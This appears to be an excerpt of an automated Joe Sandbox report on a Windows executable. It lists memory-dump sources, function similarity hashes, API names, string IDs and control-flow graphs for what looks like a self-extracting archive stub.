                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                                                        • String ID: PNG
                                                                                        • API String ID: 211097158-364855578
                                                                                        • Opcode ID: c8606208415c3a11eb94d5df8c8f8595ea54109f2541637b646828bce78d4013
                                                                                        • Instruction ID: 20cba0128381a32c5c42cea30f1a32237d3afd893f6e2dc5abf6e83ec0eff205
                                                                                        • Opcode Fuzzy Hash: c8606208415c3a11eb94d5df8c8f8595ea54109f2541637b646828bce78d4013
                                                                                        • Instruction Fuzzy Hash: 10412125A19B4681FF08AB56DC48379E3A4BF8CB94F885435DE0D47364EF7CE4898721
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn
                                                                                        • String ID: __tmp_reference_source_
                                                                                        • API String ID: 3668304517-685763994
                                                                                        • Opcode ID: b355387ad8ce45ffac16443b60546fd725022fc17da0b809259fefa86d093003
                                                                                        • Instruction ID: c74e2f072259cb1c11ef18ee1cf1157fa5731501b92980a991a9ce38dc0dbe5a
                                                                                        • Opcode Fuzzy Hash: b355387ad8ce45ffac16443b60546fd725022fc17da0b809259fefa86d093003
                                                                                        • Instruction Fuzzy Hash: 0CE2B562A196C292EA64EB35E9403FEE761FF99740F806132DB9D036A5CF3CE455C720
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn
                                                                                        • String ID: CMT
                                                                                        • API String ID: 3668304517-2756464174
                                                                                        • Opcode ID: 8d25fd63a65332c14761dec60f90f7e536d3e8df42b0a807d38d0572dc703df0
                                                                                        • Instruction ID: f9829112d72294facb5268b90c3dbd7029e0f35defeb4af6884da664e661fbef
                                                                                        • Opcode Fuzzy Hash: 8d25fd63a65332c14761dec60f90f7e536d3e8df42b0a807d38d0572dc703df0
                                                                                        • Instruction Fuzzy Hash: 26E21122B0868286FB18EB75DA502FDA7A1FF69784F802135CA5E47796DF7CE055C320

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 3856 7ff70e7940bc-7ff70e7940f3 3857 7ff70e7941d2-7ff70e7941df FindNextFileW 3856->3857 3858 7ff70e7940f9-7ff70e794101 3856->3858 3861 7ff70e7941e1-7ff70e7941f1 GetLastError 3857->3861 3862 7ff70e7941f3-7ff70e7941f6 3857->3862 3859 7ff70e794103 3858->3859 3860 7ff70e794106-7ff70e794118 FindFirstFileW 3858->3860 3859->3860 3860->3862 3863 7ff70e79411e-7ff70e794146 call 7ff70e796a0c 3860->3863 3864 7ff70e7941ca-7ff70e7941cd 3861->3864 3865 7ff70e794211-7ff70e794253 call 7ff70e7b797c call 7ff70e78129c call 7ff70e798090 3862->3865 3866 7ff70e7941f8-7ff70e794200 3862->3866 3876 7ff70e794167-7ff70e794170 3863->3876 3877 7ff70e794148-7ff70e794164 FindFirstFileW 3863->3877 3867 7ff70e7942eb-7ff70e79430e call 7ff70e7b2320 3864->3867 3892 7ff70e794255-7ff70e79426c 3865->3892 3893 7ff70e79428c-7ff70e7942e6 call 7ff70e79f168 * 3 3865->3893 3869 7ff70e794202 3866->3869 3870 7ff70e794205-7ff70e79420c call 7ff70e7820b0 3866->3870 3869->3870 3870->3865 3880 7ff70e794172-7ff70e794189 3876->3880 3881 7ff70e7941a9-7ff70e7941ad 3876->3881 3877->3876 3885 7ff70e7941a4 call 7ff70e7b220c 3880->3885 3886 7ff70e79418b-7ff70e79419e 3880->3886 3881->3862 3883 7ff70e7941af-7ff70e7941be GetLastError 3881->3883 3887 7ff70e7941c0-7ff70e7941c6 3883->3887 3888 7ff70e7941c8 3883->3888 3885->3881 3886->3885 3890 7ff70e794315-7ff70e79431b call 7ff70e7b7904 3886->3890 3887->3864 3887->3888 3888->3864 3895 7ff70e794287 call 7ff70e7b220c 3892->3895 3896 7ff70e79426e-7ff70e794281 3892->3896 3893->3867 3895->3893 3896->3895 3899 7ff70e79430f-7ff70e794314 call 7ff70e7b7904 3896->3899 3899->3890
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileFind$ErrorFirstLast_invalid_parameter_noinfo_noreturn$Next
                                                                                        • String ID:
                                                                                        • API String ID: 474548282-0
                                                                                        • Opcode ID: ee5b8a3817742aa34bf8fe6f457784b4fe5053db0f5ec5b81f22969634733f46
                                                                                        • Instruction ID: 43fa373961222c6060081622f4239834efd13ae0648361d65906965636cb812b
                                                                                        • Opcode Fuzzy Hash: ee5b8a3817742aa34bf8fe6f457784b4fe5053db0f5ec5b81f22969634733f46
                                                                                        • Instruction Fuzzy Hash: 0061A872A0864681EA14EB24EC8427DA361FF997B4F906331EABD436D9EF3CD585C710
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: CMT
                                                                                        • API String ID: 0-2756464174
                                                                                        • Opcode ID: e58ea5d07e30f29eaf86f68642e1cb38961aa44a7661b56cd2ad864dc5164ece
                                                                                        • Instruction ID: b3ac78d62c64d5c69be70aa59e97b93c344d56ac78c409ef3833a11586aed1ff
                                                                                        • Opcode Fuzzy Hash: e58ea5d07e30f29eaf86f68642e1cb38961aa44a7661b56cd2ad864dc5164ece
                                                                                        • Instruction Fuzzy Hash: 7B42E522B0868166FB18EBB4CA512FDB7A1EF69344F802136DB5E536D6DF38E519C310
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 00cc9b5d49baee892d39d1da46008d2b4229947a5b0a2c39888c4d08721f4c94
                                                                                        • Instruction ID: dbec016305d1ce3fead797688c69336a375581afc471d539bb330daa82024095
                                                                                        • Opcode Fuzzy Hash: 00cc9b5d49baee892d39d1da46008d2b4229947a5b0a2c39888c4d08721f4c94
                                                                                        • Instruction Fuzzy Hash: 89E10622A092C28AEB74EF28E84427DB790FF88748F886135DB9E47745EF7DE5418714
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 1d062b81ff85e99c027c17d7330e51e531146c9be40311c84632bfa3d7957820
                                                                                        • Instruction ID: 1197224c1462f9b7e80c20ee0ec2586ed490a347813515e188de19b795cf862d
                                                                                        • Opcode Fuzzy Hash: 1d062b81ff85e99c027c17d7330e51e531146c9be40311c84632bfa3d7957820
                                                                                        • Instruction Fuzzy Hash: CDB1D1A2B056C9A2DE58EE65D9087EDA391BB89FC4F889032DE0D0B744DF3CE155C310
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                        • String ID:
                                                                                        • API String ID: 3340455307-0
                                                                                        • Opcode ID: 70d0a199513ddd0303306b6c1f9c9cd84068436a56a79b22c40158a956f58a9a
                                                                                        • Instruction ID: 5547a1df14f19aa384bd97cc837487581f70059188d05340641dd2cb574f17a6
                                                                                        • Opcode Fuzzy Hash: 70d0a199513ddd0303306b6c1f9c9cd84068436a56a79b22c40158a956f58a9a
                                                                                        • Instruction Fuzzy Hash: 02411732B1566686FA64EE21ED9076AA252FFC8784F846030DE5D07794EF3CE4438314

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 0 7ff70e79dfd0-7ff70e79e024 call 7ff70e7b2450 GetModuleHandleW 3 7ff70e79e026-7ff70e79e039 GetProcAddress 0->3 4 7ff70e79e07b-7ff70e79e3a5 0->4 7 7ff70e79e053-7ff70e79e066 GetProcAddress 3->7 8 7ff70e79e03b-7ff70e79e04a 3->8 5 7ff70e79e503-7ff70e79e521 call 7ff70e796454 call 7ff70e797df4 4->5 6 7ff70e79e3ab-7ff70e79e3b4 call 7ff70e7bb788 4->6 20 7ff70e79e525-7ff70e79e52f call 7ff70e7951a4 5->20 6->5 14 7ff70e79e3ba-7ff70e79e3fd call 7ff70e796454 CreateFileW 6->14 7->4 11 7ff70e79e068-7ff70e79e078 7->11 8->7 11->4 22 7ff70e79e4f0-7ff70e79e4fe CloseHandle call 7ff70e781fa0 14->22 23 7ff70e79e403-7ff70e79e416 SetFilePointer 14->23 27 7ff70e79e531-7ff70e79e53c call 7ff70e79dd88 20->27 28 7ff70e79e564-7ff70e79e5ac call 7ff70e7b797c call 7ff70e78129c call 7ff70e798090 call 7ff70e781fa0 call 7ff70e7932bc 20->28 22->5 23->22 25 7ff70e79e41c-7ff70e79e43e ReadFile 23->25 25->22 29 7ff70e79e444-7ff70e79e452 25->29 27->28 39 7ff70e79e53e-7ff70e79e562 CompareStringW 27->39 67 7ff70e79e5b1-7ff70e79e5b4 28->67 32 7ff70e79e800-7ff70e79e807 call 7ff70e7b2624 29->32 33 7ff70e79e458-7ff70e79e4ac call 7ff70e7b797c call 7ff70e78129c 29->33 50 7ff70e79e4c3-7ff70e79e4d9 call 7ff70e79d0a0 33->50 39->28 42 7ff70e79e5bd-7ff70e79e5c6 39->42 42->20 45 7ff70e79e5cc 42->45 48 7ff70e79e5d1-7ff70e79e5d4 45->48 52 7ff70e79e63f-7ff70e79e642 48->52 53 7ff70e79e5d6-7ff70e79e5d9 48->53 60 7ff70e79e4db-7ff70e79e4eb call 7ff70e781fa0 * 2 50->60 61 7ff70e79e4ae-7ff70e79e4be call 7ff70e79dd88 50->61 56 7ff70e79e7c2-7ff70e79e7ff call 7ff70e781fa0 * 2 call 7ff70e7b2320 52->56 57 7ff70e79e648-7ff70e79e65b call 7ff70e797eb0 call 7ff70e7951a4 52->57 58 7ff70e79e5dd-7ff70e79e62d call 7ff70e7b797c call 7ff70e78129c call 7ff70e798090 call 7ff70e781fa0 call 7ff70e7932bc 53->58 82 7ff70e79e661-7ff70e79e701 call 7ff70e79dd88 * 2 call 7ff70e79aae0 call 7ff70e79da98 call 7ff70e79aae0 call 7ff70e79dc2c call 7ff70e7a87ac call 7ff70e7819e0 57->82 83 7ff70e79e706-7ff70e79e753 call 7ff70e79da98 AllocConsole 57->83 107 7ff70e79e62f-7ff70e79e638 58->107 108 7ff70e79e63c 58->108 60->22 61->50 72 7ff70e79e5b6 67->72 73 7ff70e79e5ce 67->73 72->42 73->48 99 7ff70e79e7b4-7ff70e79e7bb call 7ff70e7819e0 ExitProcess 82->99 94 7ff70e79e7b0 83->94 95 7ff70e79e755-7ff70e79e7aa GetCurrentProcessId AttachConsole call 7ff70e79e868 call 7ff70e79e858 GetStdHandle WriteConsoleW Sleep FreeConsole 83->95 94->99 95->94 107->58 112 7ff70e79e63a 107->112 108->52 112->52
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$Console$FileHandle$AddressProcProcess$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadModulePointerReadSleepStringSystemVersionWrite
                                                                                        • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$RpcRtRemote.dll$SSPICLI.DLL$SetDefaultDllDirectories$SetDllDirectoryW$UXTheme.dll$WINNSI.DLL$WindowsCodecs.dll$XmlLite.dll$aclui.dll$apphelp.dll$atl.dll$browcli.dll$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$cryptbase.dll$cryptsp.dll$cryptui.dll$cscapi.dll$devrtl.dll$dfscli.dll$dhcpcsvc.dll$dhcpcsvc6.dll$dnsapi.DLL$dsrole.dll$dwmapi.dll$ieframe.dll$imageres.dll$iphlpapi.DLL$kernel32$linkinfo.dll$lpk.dll$mlang.dll$mpr.dll$msasn1.dll$netapi32.dll$netutils.dll$ntmarta.dll$ntshrui.dll$oleaccrc.dll$peerdist.dll$profapi.dll$propsys.dll$psapi.dll$rasadhlp.dll$rsaenh.dll$samcli.dll$samlib.dll$secur32.dll$setupapi.dll$sfc_os.dll$shdocvw.dll$shell32.dll$slc.dll$srvcli.dll$userenv.dll$usp10.dll$uxtheme.dll$version.dll$wintrust.dll$wkscli.dll$ws2_32.dll$ws2help.dll
                                                                                        • API String ID: 1496594111-2013832382
                                                                                        • Opcode ID: 19926894803355f4926a5d38047f13a95aa4f57e947c60c8a04cc60affe7caae
                                                                                        • Instruction ID: ce443c54b3842031f0faa77937784247d0dc12564ca345c8bf492c477793093f
                                                                                        • Opcode Fuzzy Hash: 19926894803355f4926a5d38047f13a95aa4f57e947c60c8a04cc60affe7caae
                                                                                        • Instruction Fuzzy Hash: 3D320F31A09B8295E751AF64EC401E9B3A8FF88364FD0223ADA4D177A5EF3CD695C350
                                                                                        APIs
                                                                                          • Part of subcall function 00007FF70E798E58: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF70E798F8D
                                                                                        • _snwprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF70E799F75
                                                                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E79A42F
                                                                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E79A435
                                                                                          • Part of subcall function 00007FF70E7A0BBC: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF70E7A0B44), ref: 00007FF70E7A0BE9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$ByteCharConcurrency::cancel_current_taskMultiWide_snwprintf
                                                                                        • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS
                                                                                        • API String ID: 3629253777-3268106645
                                                                                        • Opcode ID: bfd9826349ba550d8c78124b786cfa0a6bd1f1a0566aa61a924ec97ec8e1947b
                                                                                        • Instruction ID: 6857331b0049a8a309558f2b41e6fae38ee42d2a015e218b73ca21f1f0c60197
                                                                                        • Opcode Fuzzy Hash: bfd9826349ba550d8c78124b786cfa0a6bd1f1a0566aa61a924ec97ec8e1947b
                                                                                        • Instruction Fuzzy Hash: E062BF22A19A8295FB10EB34DC442BDA365FF98784FC0A136DA4D476D5EF3CE585C360

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1910 7ff70e7b1900-7ff70e7b1989 call 7ff70e7b1558 1913 7ff70e7b19b4-7ff70e7b19d1 1910->1913 1914 7ff70e7b198b-7ff70e7b19af call 7ff70e7b1868 RaiseException 1910->1914 1916 7ff70e7b19e6-7ff70e7b19ea 1913->1916 1917 7ff70e7b19d3-7ff70e7b19e4 1913->1917 1922 7ff70e7b1bb8-7ff70e7b1bd5 1914->1922 1918 7ff70e7b19ed-7ff70e7b19f9 1916->1918 1917->1918 1920 7ff70e7b1a1a-7ff70e7b1a1d 1918->1920 1921 7ff70e7b19fb-7ff70e7b1a0d 1918->1921 1923 7ff70e7b1a23-7ff70e7b1a26 1920->1923 1924 7ff70e7b1ac4-7ff70e7b1acb 1920->1924 1930 7ff70e7b1a13 1921->1930 1931 7ff70e7b1b89-7ff70e7b1b93 1921->1931 1928 7ff70e7b1a28-7ff70e7b1a3b 1923->1928 1929 7ff70e7b1a3d-7ff70e7b1a52 LoadLibraryExA 1923->1929 1926 7ff70e7b1adf-7ff70e7b1ae2 1924->1926 1927 7ff70e7b1acd-7ff70e7b1adc 1924->1927 1932 7ff70e7b1b85 1926->1932 1933 7ff70e7b1ae8-7ff70e7b1aec 1926->1933 1927->1926 1928->1929 1935 7ff70e7b1aa9-7ff70e7b1ab2 1928->1935 1934 7ff70e7b1a54-7ff70e7b1a67 GetLastError 1929->1934 1929->1935 1930->1920 1942 7ff70e7b1bb0 call 7ff70e7b1868 1931->1942 1943 7ff70e7b1b95-7ff70e7b1ba6 1931->1943 1932->1931 1940 7ff70e7b1aee-7ff70e7b1af2 1933->1940 1941 7ff70e7b1b1b-7ff70e7b1b2e GetProcAddress 1933->1941 1944 7ff70e7b1a69-7ff70e7b1a7c 1934->1944 1945 7ff70e7b1a7e-7ff70e7b1aa4 call 7ff70e7b1868 RaiseException 1934->1945 1936 7ff70e7b1ab4-7ff70e7b1ab7 FreeLibrary 1935->1936 1937 7ff70e7b1abd 1935->1937 1936->1937 1937->1924 1940->1941 1949 7ff70e7b1af4-7ff70e7b1aff 1940->1949 1941->1932 1948 7ff70e7b1b30-7ff70e7b1b43 GetLastError 1941->1948 1950 7ff70e7b1bb5 1942->1950 1943->1942 1944->1935 1944->1945 1945->1922 1952 7ff70e7b1b45-7ff70e7b1b58 1948->1952 1953 7ff70e7b1b5a-7ff70e7b1b81 call 7ff70e7b1868 RaiseException call 7ff70e7b1558 1948->1953 1949->1941 1954 7ff70e7b1b01-7ff70e7b1b08 1949->1954 1950->1922 1952->1932 1952->1953 1953->1932 1954->1941 1957 7ff70e7b1b0a-7ff70e7b1b0f 1954->1957 1957->1941 1958 7ff70e7b1b11-7ff70e7b1b19 1957->1958 1958->1932 1958->1941
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: DloadSection$AccessExceptionProtectRaiseReleaseWrite$ErrorLastLibraryLoad
                                                                                        • String ID: H
                                                                                        • API String ID: 3432403771-2852464175
                                                                                        • Opcode ID: cf3fc932a6b7fb7fc9ef8320b4dd67bfc8d7ec91281715f792326570f1d4a57f
                                                                                        • Instruction ID: 2297cea8a06a13cd893e56067d868f464c5e58362eed2c9aa17890800af04ea3
                                                                                        • Opcode Fuzzy Hash: cf3fc932a6b7fb7fc9ef8320b4dd67bfc8d7ec91281715f792326570f1d4a57f
                                                                                        • Instruction Fuzzy Hash: DA916B22A06B518AEB14EF61EC502ACB3B5FF1CB94B856439DE4D17744EF38E485C320

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
